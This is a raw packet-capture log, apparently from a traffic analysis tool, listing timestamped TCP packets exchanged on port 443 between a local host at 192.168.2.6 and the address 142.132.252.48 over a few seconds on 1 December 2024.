                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.067670107 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.067694902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.067749023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.067755938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.067809105 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.073306084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.073323011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.073386908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.073393106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.073415995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.073436975 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.078321934 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.078337908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.078387022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.078393936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.078414917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.078443050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.084058046 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.084074974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.084163904 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.084178925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.084223986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.089648008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.089665890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.089725971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.089732885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.089792967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.093590021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.095331907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.095350981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.095434904 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.095442057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.095479965 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.129390955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.257982016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.258008003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.258222103 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.258236885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.258290052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.263704062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.263726950 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.263802052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.263802052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.263813019 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.263861895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.268683910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.268699884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.268765926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.268780947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.268861055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.274420977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.274437904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.274497986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.274511099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.274580956 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.280066013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.280081987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.280141115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.280150890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.280162096 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.280188084 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.285021067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.285037994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.285109043 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.285109043 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.285120964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.285195112 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.290704012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.290719986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.290779114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.290792942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.290863037 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.295917988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.296318054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.296334028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.296391964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.296397924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.296408892 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.296431065 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.320413113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.459350109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.459372997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.459454060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.459465027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.459505081 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.464499950 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.464520931 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.464591026 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.464591026 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.464606047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.464654922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.470197916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.470213890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.470262051 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.470271111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.470288038 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.470324993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.475976944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.475992918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.476054907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.476062059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.476104975 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.481484890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.481499910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.481573105 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.481578112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.481635094 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.486499071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.486515045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.486599922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.486608028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.486656904 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.492221117 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.492237091 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.492305994 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.492314100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.492355108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.496843100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.497819901 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.497834921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.497878075 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.497884035 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.497908115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.497920036 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.527235985 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.661174059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.661199093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.661425114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.661438942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.661534071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.666668892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.666688919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.666758060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.666765928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.666825056 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.672373056 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.672396898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.672472000 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.672478914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.672549009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.677496910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.677515984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.677562952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.677571058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.677602053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.677617073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.683408976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.683432102 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.683532953 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.683541059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.683605909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.688652992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.688672066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.688749075 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.688755989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.688803911 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.693711996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.693730116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.693825006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.693825006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.693834066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.693877935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.699431896 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.699448109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.699526072 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.699532986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.699583054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.862421989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.862445116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.862540007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.862550020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.862612009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.868129015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.868145943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.868315935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.868330956 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.868381023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.873260021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.873279095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.873346090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.873362064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.873436928 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.878818035 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.878837109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.878909111 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.878918886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.878978014 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.884407043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.884423971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.884510994 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.884520054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.884557962 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.889355898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.889374018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.889461040 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.889467955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.889514923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.889564037 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.895149946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.895167112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.895237923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.895243883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.895281076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.900686979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.900705099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.900767088 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.900774956 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.900823116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.906299114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.063721895 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.063741922 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.063834906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.063843966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.064013958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.069469929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.069487095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.069577932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.069590092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.069638014 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.074513912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.074532032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.074596882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.074604988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.074626923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.074651957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.080243111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.080260038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.080337048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.080343962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.080379963 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.085777998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.085793972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.085855961 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.085863113 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.085906029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.094378948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.094393969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.094456911 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.094463110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.094501019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.094501019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.096613884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.096630096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.096700907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.096714020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.096784115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.103748083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.103763103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.103828907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.103836060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.103878975 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.264833927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.264857054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.264935970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.264946938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.265014887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.270945072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.270962000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.271060944 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.271075010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.271125078 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.275636911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.275652885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.275747061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.275753975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.275815010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.281388998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.281404018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.281467915 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.281475067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.281505108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:00.281527042 CET49721443192.168.2.6142.132.252.48
